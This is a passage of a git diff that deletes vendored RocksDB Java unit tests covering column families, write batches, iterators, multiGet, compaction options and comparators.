-            outValue);
-        assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-        assertThat(outValue).isEqualTo("value".getBytes());
-        // found value which fits partially
-        getResult = db.get(columnFamilyHandleList.get(0), new ReadOptions(),
-            "key2".getBytes(), outValue);
-        assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-        assertThat(outValue).isEqualTo("12345".getBytes());
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void createWriteDropColumnFamily() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      ColumnFamilyHandle tmpColumnFamilyHandle = null;
-      try {
-        tmpColumnFamilyHandle = db.createColumnFamily(
-            new ColumnFamilyDescriptor("tmpCF".getBytes(),
-                new ColumnFamilyOptions()));
-        db.put(tmpColumnFamilyHandle, "key".getBytes(), "value".getBytes());
-        db.dropColumnFamily(tmpColumnFamilyHandle);
-      } finally {
-        if (tmpColumnFamilyHandle != null) {
-          tmpColumnFamilyHandle.close();
-        }
-        for (ColumnFamilyHandle columnFamilyHandle : columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void writeBatch() throws RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final ColumnFamilyOptions defaultCfOptions = new ColumnFamilyOptions()
-             .setMergeOperator(stringAppendOperator)) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY,
-              defaultCfOptions),
-          new ColumnFamilyDescriptor("new_cf".getBytes()));
-      final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-      try (final DBOptions options = new DBOptions()
-          .setCreateIfMissing(true)
-          .setCreateMissingColumnFamilies(true);
-           final RocksDB db = RocksDB.open(options,
-               dbFolder.getRoot().getAbsolutePath(),
-               cfDescriptors, columnFamilyHandleList);
-           final WriteBatch writeBatch = new WriteBatch();
-           final WriteOptions writeOpt = new WriteOptions()) {
-        try {
-          writeBatch.put("key".getBytes(), "value".getBytes());
-          writeBatch.put(db.getDefaultColumnFamily(),
-              "mergeKey".getBytes(), "merge".getBytes());
-          writeBatch.merge(db.getDefaultColumnFamily(), "mergeKey".getBytes(),
-              "merge".getBytes());
-          writeBatch.put(columnFamilyHandleList.get(1), "newcfkey".getBytes(),
-              "value".getBytes());
-          writeBatch.put(columnFamilyHandleList.get(1), "newcfkey2".getBytes(),
-              "value2".getBytes());
-          writeBatch.remove("xyz".getBytes());
-          writeBatch.remove(columnFamilyHandleList.get(1), "xyz".getBytes());
-          db.write(writeOpt, writeBatch);
-
-          assertThat(db.get(columnFamilyHandleList.get(1),
-              "xyz".getBytes()) == null);
-          assertThat(new String(db.get(columnFamilyHandleList.get(1),
-              "newcfkey".getBytes()))).isEqualTo("value");
-          assertThat(new String(db.get(columnFamilyHandleList.get(1),
-              "newcfkey2".getBytes()))).isEqualTo("value2");
-          assertThat(new String(db.get("key".getBytes()))).isEqualTo("value");
-          // check if key is merged
-          assertThat(new String(db.get(db.getDefaultColumnFamily(),
-              "mergeKey".getBytes()))).isEqualTo("merge,merge");
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              columnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void iteratorOnColumnFamily() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-
-        db.put(columnFamilyHandleList.get(1), "newcfkey".getBytes(),
-            "value".getBytes());
-        db.put(columnFamilyHandleList.get(1), "newcfkey2".getBytes(),
-            "value2".getBytes());
-        try (final RocksIterator rocksIterator =
-                 db.newIterator(columnFamilyHandleList.get(1))) {
-          rocksIterator.seekToFirst();
-          Map<String, String> refMap = new HashMap<>();
-          refMap.put("newcfkey", "value");
-          refMap.put("newcfkey2", "value2");
-          int i = 0;
-          while (rocksIterator.isValid()) {
-            i++;
-            assertThat(refMap.get(new String(rocksIterator.key()))).
-                isEqualTo(new String(rocksIterator.value()));
-            rocksIterator.next();
-          }
-          assertThat(i).isEqualTo(2);
-        }
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void multiGet() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        db.put(columnFamilyHandleList.get(0), "key".getBytes(),
-            "value".getBytes());
-        db.put(columnFamilyHandleList.get(1), "newcfkey".getBytes(),
-            "value".getBytes());
-
-        final List<byte[]> keys = Arrays.asList(new byte[][]{
-            "key".getBytes(), "newcfkey".getBytes()
-        });
-        Map<byte[], byte[]> retValues = db.multiGet(columnFamilyHandleList,
-            keys);
-        assertThat(retValues.size()).isEqualTo(2);
-        assertThat(new String(retValues.get(keys.get(0))))
-            .isEqualTo("value");
-        assertThat(new String(retValues.get(keys.get(1))))
-            .isEqualTo("value");
-        retValues = db.multiGet(new ReadOptions(), columnFamilyHandleList,
-            keys);
-        assertThat(retValues.size()).isEqualTo(2);
-        assertThat(new String(retValues.get(keys.get(0))))
-            .isEqualTo("value");
-        assertThat(new String(retValues.get(keys.get(1))))
-            .isEqualTo("value");
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void properties() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        assertThat(db.getProperty("rocksdb.estimate-num-keys")).
-            isNotNull();
-        assertThat(db.getLongProperty(columnFamilyHandleList.get(0),
-            "rocksdb.estimate-num-keys")).isGreaterThanOrEqualTo(0);
-        assertThat(db.getProperty("rocksdb.stats")).isNotNull();
-        assertThat(db.getProperty(columnFamilyHandleList.get(0),
-            "rocksdb.sstables")).isNotNull();
-        assertThat(db.getProperty(columnFamilyHandleList.get(1),
-            "rocksdb.estimate-num-keys")).isNotNull();
-        assertThat(db.getProperty(columnFamilyHandleList.get(1),
-            "rocksdb.stats")).isNotNull();
-        assertThat(db.getProperty(columnFamilyHandleList.get(1),
-            "rocksdb.sstables")).isNotNull();
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-
-  @Test
-  public void iterators() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      List<RocksIterator> iterators = null;
-      try {
-        iterators = db.newIterators(columnFamilyHandleList);
-        assertThat(iterators.size()).isEqualTo(2);
-        RocksIterator iter = iterators.get(0);
-        iter.seekToFirst();
-        final Map<String, String> defRefMap = new HashMap<>();
-        defRefMap.put("dfkey1", "dfvalue");
-        defRefMap.put("key", "value");
-        while (iter.isValid()) {
-          assertThat(defRefMap.get(new String(iter.key()))).
-              isEqualTo(new String(iter.value()));
-          iter.next();
-        }
-        // iterate over new_cf key/value pairs
-        final Map<String, String> cfRefMap = new HashMap<>();
-        cfRefMap.put("newcfkey", "value");
-        cfRefMap.put("newcfkey2", "value2");
-        iter = iterators.get(1);
-        iter.seekToFirst();
-        while (iter.isValid()) {
-          assertThat(cfRefMap.get(new String(iter.key()))).
-              isEqualTo(new String(iter.value()));
-          iter.next();
-        }
-      } finally {
-        if (iterators != null) {
-          for (final RocksIterator rocksIterator : iterators) {
-            rocksIterator.close();
-          }
-        }
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failPutDisposedCF() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        db.dropColumnFamily(columnFamilyHandleList.get(1));
-        db.put(columnFamilyHandleList.get(1), "key".getBytes(),
-            "value".getBytes());
-      } finally {
-        for (ColumnFamilyHandle columnFamilyHandle : columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failRemoveDisposedCF() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        db.dropColumnFamily(columnFamilyHandleList.get(1));
-        db.remove(columnFamilyHandleList.get(1), "key".getBytes());
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failGetDisposedCF() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      try {
-        db.dropColumnFamily(columnFamilyHandleList.get(1));
-        db.get(columnFamilyHandleList.get(1), "key".getBytes());
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failMultiGetWithoutCorrectNumberOfCF() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes()));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      try {
-        final List<byte[]> keys = new ArrayList<>();
-        keys.add("key".getBytes());
-        keys.add("newcfkey".getBytes());
-        final List<ColumnFamilyHandle> cfCustomList = new ArrayList<>();
-        db.multiGet(cfCustomList, keys);
-
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void testByteCreateFolumnFamily() throws RocksDBException {
-
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      final byte[] b0 = new byte[]{(byte) 0x00};
-      final byte[] b1 = new byte[]{(byte) 0x01};
-      final byte[] b2 = new byte[]{(byte) 0x02};
-      ColumnFamilyHandle cf1 = null, cf2 = null, cf3 = null;
-      try {
-        cf1 = db.createColumnFamily(new ColumnFamilyDescriptor(b0));
-        cf2 = db.createColumnFamily(new ColumnFamilyDescriptor(b1));
-        final List<byte[]> families = RocksDB.listColumnFamilies(options,
-            dbFolder.getRoot().getAbsolutePath());
-        assertThat(families).contains("default".getBytes(), b0, b1);
-        cf3 = db.createColumnFamily(new ColumnFamilyDescriptor(b2));
-      } finally {
-        if (cf1 != null) {
-          cf1.close();
-        }
-        if (cf2 != null) {
-          cf2.close();
-        }
-        if (cf3 != null) {
-          cf3.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void testCFNamesWithZeroBytes() throws RocksDBException {
-    ColumnFamilyHandle cf1 = null, cf2 = null;
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-    ) {
-      try {
-        final byte[] b0 = new byte[]{0, 0};
-        final byte[] b1 = new byte[]{0, 1};
-        cf1 = db.createColumnFamily(new ColumnFamilyDescriptor(b0));
-        cf2 = db.createColumnFamily(new ColumnFamilyDescriptor(b1));
-        final List<byte[]> families = RocksDB.listColumnFamilies(options,
-            dbFolder.getRoot().getAbsolutePath());
-        assertThat(families).contains("default".getBytes(), b0, b1);
-      } finally {
-        if (cf1 != null) {
-          cf1.close();
-        }
-        if (cf2 != null) {
-          cf2.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void testCFNameSimplifiedChinese() throws RocksDBException {
-    ColumnFamilyHandle columnFamilyHandle = null;
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-    ) {
-      try {
-        final String simplifiedChinese = "\u7b80\u4f53\u5b57";
-        columnFamilyHandle = db.createColumnFamily(
-            new ColumnFamilyDescriptor(simplifiedChinese.getBytes()));
-
-        final List<byte[]> families = RocksDB.listColumnFamilies(options,
-            dbFolder.getRoot().getAbsolutePath());
-        assertThat(families).contains("default".getBytes(),
-            simplifiedChinese.getBytes());
-      } finally {
-        if (columnFamilyHandle != null) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java
deleted file mode 100644
index 370a28e..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java
+++ /dev/null
@@ -1,26 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompactionOptionsFIFOTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void maxTableFilesSize() {
-    final long size = 500 * 1024 * 1026;
-    try(final CompactionOptionsFIFO opt = new CompactionOptionsFIFO()) {
-      opt.setMaxTableFilesSize(size);
-      assertThat(opt.maxTableFilesSize()).isEqualTo(size);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java
deleted file mode 100644
index 5e2d195..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompactionOptionsUniversalTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void sizeRatio() {
-    final int sizeRatio = 4;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setSizeRatio(sizeRatio);
-      assertThat(opt.sizeRatio()).isEqualTo(sizeRatio);
-    }
-  }
-
-  @Test
-  public void minMergeWidth() {
-    final int minMergeWidth = 3;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setMinMergeWidth(minMergeWidth);
-      assertThat(opt.minMergeWidth()).isEqualTo(minMergeWidth);
-    }
-  }
-
-  @Test
-  public void maxMergeWidth() {
-    final int maxMergeWidth = Integer.MAX_VALUE - 1234;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setMaxMergeWidth(maxMergeWidth);
-      assertThat(opt.maxMergeWidth()).isEqualTo(maxMergeWidth);
-    }
-  }
-
-  @Test
-  public void maxSizeAmplificationPercent() {
-    final int maxSizeAmplificationPercent = 150;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setMaxSizeAmplificationPercent(maxSizeAmplificationPercent);
-      assertThat(opt.maxSizeAmplificationPercent()).isEqualTo(maxSizeAmplificationPercent);
-    }
-  }
-
-  @Test
-  public void compressionSizePercent() {
-    final int compressionSizePercent = 500;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setCompressionSizePercent(compressionSizePercent);
-      assertThat(opt.compressionSizePercent()).isEqualTo(compressionSizePercent);
-    }
-  }
-
-  @Test
-  public void stopStyle() {
-    final CompactionStopStyle stopStyle = CompactionStopStyle.CompactionStopStyleSimilarSize;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setStopStyle(stopStyle);
-      assertThat(opt.stopStyle()).isEqualTo(stopStyle);
-    }
-  }
-
-  @Test
-  public void allowTrivialMove() {
-    final boolean allowTrivialMove = true;
-    try(final CompactionOptionsUniversal opt = new CompactionOptionsUniversal()) {
-      opt.setAllowTrivialMove(allowTrivialMove);
-      assertThat(opt.allowTrivialMove()).isEqualTo(allowTrivialMove);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionPriorityTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionPriorityTest.java
deleted file mode 100644
index b078e13..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionPriorityTest.java
+++ /dev/null
@@ -1,31 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompactionPriorityTest {
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failIfIllegalByteValueProvided() {
-    CompactionPriority.getCompactionPriority((byte) -1);
-  }
-
-  @Test
-  public void getCompactionPriority() {
-    assertThat(CompactionPriority.getCompactionPriority(
-        CompactionPriority.OldestLargestSeqFirst.getValue()))
-            .isEqualTo(CompactionPriority.OldestLargestSeqFirst);
-  }
-
-  @Test
-  public void valueOf() {
-    assertThat(CompactionPriority.valueOf("OldestSmallestSeqFirst")).
-        isEqualTo(CompactionPriority.OldestSmallestSeqFirst);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java
deleted file mode 100644
index 4c8a209..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java
+++ /dev/null
@@ -1,31 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompactionStopStyleTest {
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failIfIllegalByteValueProvided() {
-    CompactionStopStyle.getCompactionStopStyle((byte) -1);
-  }
-
-  @Test
-  public void getCompactionStopStyle() {
-    assertThat(CompactionStopStyle.getCompactionStopStyle(
-        CompactionStopStyle.CompactionStopStyleTotalSize.getValue()))
-            .isEqualTo(CompactionStopStyle.CompactionStopStyleTotalSize);
-  }
-
-  @Test
-  public void valueOf() {
-    assertThat(CompactionStopStyle.valueOf("CompactionStopStyleSimilarSize")).
-        isEqualTo(CompactionStopStyle.CompactionStopStyleSimilarSize);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java
deleted file mode 100644
index a45c717..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ComparatorOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void comparatorOptions() {
-    try(final ComparatorOptions copt = new ComparatorOptions()) {
-
-      assertThat(copt).isNotNull();
-      // UseAdaptiveMutex test
-      copt.setUseAdaptiveMutex(true);
-      assertThat(copt.useAdaptiveMutex()).isTrue();
-
-      copt.setUseAdaptiveMutex(false);
-      assertThat(copt.useAdaptiveMutex()).isFalse();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorTest.java
deleted file mode 100644
index 63dee72..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ComparatorTest.java
+++ /dev/null
@@ -1,200 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.io.IOException;
-import java.nio.file.FileSystems;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ComparatorTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-     public void javaComparator() throws IOException, RocksDBException {
-
-    final AbstractComparatorTest comparatorTest = new AbstractComparatorTest() {
-      @Override
-      public AbstractComparator getAscendingIntKeyComparator() {
-        return new Comparator(new ComparatorOptions()) {
-
-          @Override
-          public String name() {
-            return "test.AscendingIntKeyComparator";
-          }
-
-          @Override
-          public int compare(final Slice a, final Slice b) {
-            return compareIntKeys(a.data(), b.data());
-          }
-        };
-      }
-    };
-
-    // test the round-tripability of keys written and read with the Comparator
-    comparatorTest.testRoundtrip(FileSystems.getDefault().getPath(
-        dbFolder.getRoot().getAbsolutePath()));
-  }
-
-  @Test
-  public void javaComparatorCf() throws IOException, RocksDBException {
-
-    final AbstractComparatorTest comparatorTest = new AbstractComparatorTest() {
-      @Override
-      public AbstractComparator getAscendingIntKeyComparator() {
-        return new Comparator(new ComparatorOptions()) {
-
-          @Override
-          public String name() {
-            return "test.AscendingIntKeyComparator";
-          }
-
-          @Override
-          public int compare(final Slice a, final Slice b) {
-            return compareIntKeys(a.data(), b.data());
-          }
-        };
-      }
-    };
-
-    // test the round-tripability of keys written and read with the Comparator
-    comparatorTest.testRoundtripCf(FileSystems.getDefault().getPath(
-        dbFolder.getRoot().getAbsolutePath()));
-  }
-
-  @Test
-  public void builtinForwardComparator()
-      throws RocksDBException {
-    try (final Options options = new Options()
-          .setCreateIfMissing(true)
-          .setComparator(BuiltinComparator.BYTEWISE_COMPARATOR);
-         final RocksDB rocksDb = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      rocksDb.put("abc1".getBytes(), "abc1".getBytes());
-      rocksDb.put("abc2".getBytes(), "abc2".getBytes());
-      rocksDb.put("abc3".getBytes(), "abc3".getBytes());
-
-      try(final RocksIterator rocksIterator = rocksDb.newIterator()) {
-        // Iterate over keys using a iterator
-        rocksIterator.seekToFirst();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc1".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc1".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc2".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc2".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc3".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc3".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isFalse();
-        // Get last one
-        rocksIterator.seekToLast();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc3".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc3".getBytes());
-        // Seek for abc
-        rocksIterator.seek("abc".getBytes());
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc1".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc1".getBytes());
-      }
-    }
-  }
-
-  @Test
-  public void builtinReverseComparator()
-      throws RocksDBException {
-    try (final Options options = new Options()
-      .setCreateIfMissing(true)
-      .setComparator(BuiltinComparator.REVERSE_BYTEWISE_COMPARATOR);
-         final RocksDB rocksDb = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-
-      rocksDb.put("abc1".getBytes(), "abc1".getBytes());
-      rocksDb.put("abc2".getBytes(), "abc2".getBytes());
-      rocksDb.put("abc3".getBytes(), "abc3".getBytes());
-
-      try (final RocksIterator rocksIterator = rocksDb.newIterator()) {
-        // Iterate over keys using a iterator
-        rocksIterator.seekToFirst();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc3".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc3".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc2".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc2".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc1".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc1".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isFalse();
